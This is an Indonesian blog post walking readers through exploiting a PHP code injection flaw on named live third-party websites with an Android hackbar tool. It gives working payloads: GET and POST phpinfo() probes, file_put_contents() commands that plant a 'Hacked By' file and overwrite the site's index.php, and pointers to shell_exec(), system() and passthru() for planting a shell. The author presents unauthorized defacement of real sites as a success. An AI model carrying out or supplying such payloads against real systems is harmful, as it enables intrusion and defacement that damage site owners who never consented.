Ad Unit (Iklan) BIG

Exploitasi bug PHPCode Injection

Post a Comment
-
Hai Sobat.
Saya ikal
Disini, saya akan sharing-sharing sedikit nih
-

Sesuai judul, Jadi materi kali ini gw bakal bawakan Exploitasi bug yang kategori nya p2/p1 
[ high - critical ]

Yaitu php code injection.

Apa itu phpcode injection ???

phpcode injection dari nama nya saja yaitu php inject, berarti kita bisa meng inject sebuah website dengan menggunakan command² berbahaya

phpcode injection ini kategori kedalam rce juga.

Resiko nyari bug ini yaitu :

1.Susah cari target nya, di karenakan jarang dan juga susah ye

2. Jika udah menemukan bug ini, kita juga susah meng exploitasi nya, tergantung dari web nya.
Nah disini gw sudah ada live target nya, dan karena target sudah usang dan jelek kaya muka dia

Di exploitasi bug php code injection ini, terdapat dua method exploitasi. Yaitu $_GET dan $_POST

Example exploitasi php code injection $_GET : 
https://lon-t.online/login.php?msg=phpinfo()
https://lon-t.online/login.php?msg=@phpinfo()

Berhubung disini target gw memiliki $_POST untuk mengeksekusi nya, jadi kita bisa menggunakan androhackbar atau post data lainnya.

Apakah di android exploitasi ini dapat di terapkan? Tentu saja. Jadi mari kita mulai
Bahan :
- androhackbar : disini 
- target : imakemusik.it 


Disitu terlihat $_POST[x] dan directory /var/www/vhosts/wildweb1000354/httpdocs/ kita akan menggunakan itu untuk mengeksekusi nya. 
> sekarang pertama kita buka androhackbar, dan nyalakan post data dari off ke on.
> lalu tempel website beserta path nya ke dalam androhackbar, seperti gambar di bawah ini 


> lalu kita masukan payload nya Di bagian post data. Pertama-tama kita akan memanggil phpinfo untuk melihat disable function nya terlebih dahulu.
Command / payload : x=phpinfo()
Taruh di post data lalu klik execute.


> phpinfo sudah terpanggil, dan disable function pun sudah terlihat. Dan kita tidak dapat melakukan ini ke server : 

mail,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority

>  fiola, command readfile() fopen() dan file_get_contents() tidak terkena disable atau command tersebut dapat di perbolehkan (enabled)
> sekarang tanpa lama-lama. Saya akan menanam kan file txt saja ke dalam server dengan menggunakan file_get_contents().
Contoh command : x=file_put_contents('DOCUMENT ROOT/file.txt','TEXT YANG MAU DI MASUKAN')

Dan command nya seperti ini :
x=file_put_contents('/var/www/vhosts/wildweb1000354/httpdocs/Dx.txt','Hacked By 1K4lL_* | DragonXploiter')
Taruh di post data lalu klik execute.


> terlihat tidak ada perubahan, namun? Sekarang kita coba mengakses file nya. Yaitu https://lon-t.online/Dx.txt


> yaps, berhasil. Sekarang kita coba take index.php nya dengan command seperti ini
x=file_put_contents('/var/www/vhosts/wildweb1000354/httpdocs/index.php','Hacked By 1K4lL_* | DragonXploiter')
Taruh di post data lalu klik execute.
> jika sudah, maka akan sama, terlihat tidak ada perubahan. Sekarang mari kita akses index.php nya.


> index pun terhacked by wkwk. Untuk menanam shell, kalian bisa memakai command shell_exec(), exec(), system(), passthru(). Yah mungkin segini saja artikel kali ini, semoga bermanfaat. Untuk laravel phpunit dan LFI saya masih belom bisa memberi kan artikel nya, di karenakan target susah untuk di dapat atau mungkin skill dorking ku mengurangi xixix.

Referensi : 

Thanks 
See by
Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

Post a Comment

Dapatkan Notifikasi Dengan Email